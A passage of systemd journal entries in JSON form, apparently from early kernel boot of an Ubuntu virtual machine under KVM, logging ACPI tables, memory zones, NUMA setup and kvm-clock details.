"_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c743000, 0x3c743fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=31;b=e2b08827b5804427b422c10c84f1567e;m=558315;t=5bd16dd19027d;x=8216a6812b4e768a", "__REALTIME_TIMESTAMP" : "1615280779887229", "__MONOTONIC_TIMESTAMP" : "5604117", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c744000, 0x3c744fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=32;b=e2b08827b5804427b422c10c84f1567e;m=55831e;t=5bd16dd190286;x=60eae5c564d793ce", "__REALTIME_TIMESTAMP" : "1615280779887238", "__MONOTONIC_TIMESTAMP" : "5604126", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "BRK [0x3c745000, 0x3c745fff] PGTABLE" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=33;b=e2b08827b5804427b422c10c84f1567e;m=558327;t=5bd16dd19028e;x=d9f5ca398cadfe66", "__REALTIME_TIMESTAMP" : "1615280779887246", "__MONOTONIC_TIMESTAMP" : "5604135", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "RAMDISK: [mem 0x35a8b000-0x36d3cfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=34;b=e2b08827b5804427b422c10c84f1567e;m=558330;t=5bd16dd190297;x=3d2a38af987659e7", "__REALTIME_TIMESTAMP" : "1615280779887255", "__MONOTONIC_TIMESTAMP" : "5604144", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: Early table checksum verification disabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=35;b=e2b08827b5804427b422c10c84f1567e;m=558339;t=5bd16dd1902a0;x=d7f562e2ee7b8782", "__REALTIME_TIMESTAMP" : "1615280779887264", "__MONOTONIC_TIMESTAMP" : "5604153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDP 0x00000000000F6880 000014 (v00 BOCHS )" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=36;b=e2b08827b5804427b422c10c84f1567e;m=558345;t=5bd16dd1902ad;x=9aa520c7db1dadf7", "__REALTIME_TIMESTAMP" : "1615280779887277", "__MONOTONIC_TIMESTAMP" : "5604165", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: RSDT 0x000000007FFE1504 00002C (v01 BOCHS BXPCRSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=37;b=e2b08827b5804427b422c10c84f1567e;m=55834e;t=5bd16dd1902b6;x=61ec46507e358bdf", "__REALTIME_TIMESTAMP" : "1615280779887286", "__MONOTONIC_TIMESTAMP" : "5604174", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACP 0x000000007FFE1418 000074 (v01 BOCHS BXPCFACP 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=38;b=e2b08827b5804427b422c10c84f1567e;m=55835b;t=5bd16dd1902c2;x=9365a8a8002a3511", "__REALTIME_TIMESTAMP" : "1615280779887298", "__MONOTONIC_TIMESTAMP" : "5604187", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: DSDT 0x000000007FFE0040 0013D8 (v01 BOCHS BXPCDSDT 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=39;b=e2b08827b5804427b422c10c84f1567e;m=558364;t=5bd16dd1902cb;x=964af1c7dae52a2a", "__REALTIME_TIMESTAMP" : "1615280779887307", "__MONOTONIC_TIMESTAMP" : "5604196", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: FACS 0x000000007FFE0000 000040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3a;b=e2b08827b5804427b422c10c84f1567e;m=55836d;t=5bd16dd1902d4;x=cf945d10e52f8f74", "__REALTIME_TIMESTAMP" : "1615280779887316", "__MONOTONIC_TIMESTAMP" : "5604205", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: APIC 0x000000007FFE148C 000078 (v01 BOCHS BXPCAPIC 00000001 BXPC 00000001)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3b;b=e2b08827b5804427b422c10c84f1567e;m=558376;t=5bd16dd1902dd;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887325", "__MONOTONIC_TIMESTAMP" : "5604214", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3c;b=e2b08827b5804427b422c10c84f1567e;m=55838f;t=5bd16dd1902f7;x=e9018680f2c50874", "__REALTIME_TIMESTAMP" : "1615280779887351", "__MONOTONIC_TIMESTAMP" : "5604239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "No NUMA configuration found" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3d;b=e2b08827b5804427b422c10c84f1567e;m=5583a9;t=5bd16dd190310;x=b35bf5c4d6572fc4", "__REALTIME_TIMESTAMP" : "1615280779887376", "__MONOTONIC_TIMESTAMP" : "5604265", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Faking a node at [mem 0x0000000000000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3e;b=e2b08827b5804427b422c10c84f1567e;m=5583b3;t=5bd16dd19031a;x=818beee0419abbe8", "__REALTIME_TIMESTAMP" : "1615280779887386", "__MONOTONIC_TIMESTAMP" : "5604275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "NODE_DATA(0) allocated [mem 0x7ffb1000-0x7ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=3f;b=e2b08827b5804427b422c10c84f1567e;m=5583c7;t=5bd16dd19032e;x=51812eea7aa9592c", "__REALTIME_TIMESTAMP" : "1615280779887406", "__MONOTONIC_TIMESTAMP" : "5604295", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: cpu 0, msr 0:7ff30001, primary cpu clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=40;b=e2b08827b5804427b422c10c84f1567e;m=5583d0;t=5bd16dd190338;x=939313d67c299460", "__REALTIME_TIMESTAMP" : "1615280779887416", "__MONOTONIC_TIMESTAMP" : "5604304", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: Using msrs 4b564d01 and 4b564d00" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=41;b=e2b08827b5804427b422c10c84f1567e;m=5583da;t=5bd16dd190341;x=cf0e2f81d211a7f4", "__REALTIME_TIMESTAMP" : "1615280779887425", "__MONOTONIC_TIMESTAMP" : "5604314", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-clock: using sched offset of 11561140508 cycles" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=42;b=e2b08827b5804427b422c10c84f1567e;m=5583e6;t=5bd16dd19034e;x=d9b58dae827177ce", "__REALTIME_TIMESTAMP" : "1615280779887438", "__MONOTONIC_TIMESTAMP" : "5604326", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=43;b=e2b08827b5804427b422c10c84f1567e;m=5583f0;t=5bd16dd190357;x=c9b43b89a213bb5a", "__REALTIME_TIMESTAMP" : "1615280779887447", "__MONOTONIC_TIMESTAMP" : "5604336", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Zone ranges:" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=44;b=e2b08827b5804427b422c10c84f1567e;m=5583f9;t=5bd16dd190361;x=416a4da24a7374a1", "__REALTIME_TIMESTAMP" : "1615280779887457", "__MONOTONIC_TIMESTAMP" : "5604345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA [mem 0x0000000000001000-0x0000000000ffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=45;b=e2b08827b5804427b422c10c84f1567e;m=558403;t=5bd16dd19036a;x=662b5e9ad1909f5e", "__REALTIME_TIMESTAMP" : "1615280779887466", "__MONOTONIC_TIMESTAMP" : "5604355", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " DMA32 [mem 0x0000000001000000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=46;b=e2b08827b5804427b422c10c84f1567e;m=55840c;t=5bd16dd190374;x=3a39ce413a58fd84", "__REALTIME_TIMESTAMP" : "1615280779887476", "__MONOTONIC_TIMESTAMP" : "5604364", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Normal empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=47;b=e2b08827b5804427b422c10c84f1567e;m=558416;t=5bd16dd19037d;x=2500f0e789913fc2", "__REALTIME_TIMESTAMP" : "1615280779887485", "__MONOTONIC_TIMESTAMP" : "5604374", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " Device empty" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=48;b=e2b08827b5804427b422c10c84f1567e;m=55841f;t=5bd16dd190387;x=6fd45817ea8b18ff", "__REALTIME_TIMESTAMP" : "1615280779887495", "__MONOTONIC_TIMESTAMP" : "5604383", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Movable zone start for each node" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=49;b=e2b08827b5804427b422c10c84f1567e;m=558439;t=5bd16dd1903a1;x=ea71b959dd5cf713", "__REALTIME_TIMESTAMP" : "1615280779887521", "__MONOTONIC_TIMESTAMP" : "5604409", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Early memory node ranges" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4a;b=e2b08827b5804427b422c10c84f1567e;m=558444;t=5bd16dd1903ab;x=220b66ff95907466", "__REALTIME_TIMESTAMP" : "1615280779887531", "__MONOTONIC_TIMESTAMP" : "5604420", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000001000-0x000000000009efff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4b;b=e2b08827b5804427b422c10c84f1567e;m=558451;t=5bd16dd1903b9;x=ebaa6321ff01d24f", "__REALTIME_TIMESTAMP" : "1615280779887545", "__MONOTONIC_TIMESTAMP" : "5604433", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000100000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4c;b=e2b08827b5804427b422c10c84f1567e;m=55845b;t=5bd16dd1903c3;x=cecbae49965d8230", "__REALTIME_TIMESTAMP" : "1615280779887555", "__MONOTONIC_TIMESTAMP" : "5604443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Reserved but unavailable: 98 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4d;b=e2b08827b5804427b422c10c84f1567e;m=558465;t=5bd16dd1903cc;x=4ad7a4d8f6cac2ef", "__REALTIME_TIMESTAMP" : "1615280779887564", "__MONOTONIC_TIMESTAMP" : "5604453", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Initmem setup node 0 [mem 0x0000000000001000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4e;b=e2b08827b5804427b422c10c84f1567e;m=55846f;t=5bd16dd1903d6;x=39a566aa9c4d47fe", "__REALTIME_TIMESTAMP" : "1615280779887574", "__MONOTONIC_TIMESTAMP" : "5604463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "On node 0 totalpages: 524154" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4f;b=e2b08827b5804427b422c10c84f1567e;m=55847b;t=5bd16dd1903e3;x=b35787aecf128a45", "__REALTIME_TIMESTAMP" : "1615280779887587", "__MONOTONIC_TIMESTAMP" : "5604475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 64 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=50;b=e2b08827b5804427b422c10c84f1567e;m=558485;t=5bd16dd1903ed;x=774bf1c47c000e10", "__REALTIME_TIMESTAMP" : "1615280779887597", "__MONOTONIC_TIMESTAMP" : "5604485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 21 pages reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=51;b=e2b08827b5804427b422c10c84f1567e;m=55848f;t=5bd16dd1903f7;x=cd8cce657b17ab84", "__REALTIME_TIMESTAMP" : "1615280779887607", "__MONOTONIC_TIMESTAMP" : "5604495", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 3998 pages, LIFO batch:0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=52;b=e2b08827b5804427b422c10c84f1567e;m=558499;t=5bd16dd190401;x=9e81a5d794812128", "__REALTIME_TIMESTAMP" : "1615280779887617", "__MONOTONIC_TIMESTAMP" : "5604505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 8128 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=53;b=e2b08827b5804427b422c10c84f1567e;m=5584a3;t=5bd16dd19040b;x=1bfa40fc3d32423e", "__REALTIME_TIMESTAMP" : "1615280779887627", "__MONOTONIC_TIMESTAMP" : "5604515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 520156 pages, LIFO batch:31" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=54;b=e2b08827b5804427b422c10c84f1567e;m=5584ad;t=5bd16dd190415;x=28af2f6ab1436462", "__REALTIME_TIMESTAMP" : "1615280779887637", "__MONOTONIC_TIMESTAMP" : "5604525", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: PM-Timer IO Port: 0x608" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=55;b=e2b08827b5804427b422c10c84f1567e;m=5584b7;t=5bd16dd19041e;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887646", "__MONOTONIC_TIMESTAMP" : "5604535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=56;b=e2b08827b5804427b422c10c84f1567e;m=5584c1;t=5bd16dd190428;x=69ccfa8beb9c4d88", "__REALTIME_TIMESTAMP" : "1615280779887656", "__MONOTONIC_TIMESTAMP" : "5604545", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=57;b=e2b08827b5804427b422c10c84f1567e;m=5584cb;t=5bd16dd190432;x=f0a4d98fcffa2fec", "__REALTIME_TIMESTAMP" : "1615280779887666", "__MONOTONIC_TIMESTAMP" : "5604555", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "IOAPIC[0]: apic_id 0, version 17, address 0xfec00000, GSI 0-23" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=58;b=e2b08827b5804427b422c10c84f1567e;m=5584d5;t=5bd16dd19043d;x=9e51ba997007efbf", "__REALTIME_TIMESTAMP" : "1615280779887677", "__MONOTONIC_TIMESTAMP" : "5604565", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=59;b=e2b08827b5804427b422c10c84f1567e;m=5584df;t=5bd16dd190446;x=5903629783fb36b7", "__REALTIME_TIMESTAMP" : "1615280779887686", "__MONOTONIC_TIMESTAMP" : "5604575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", 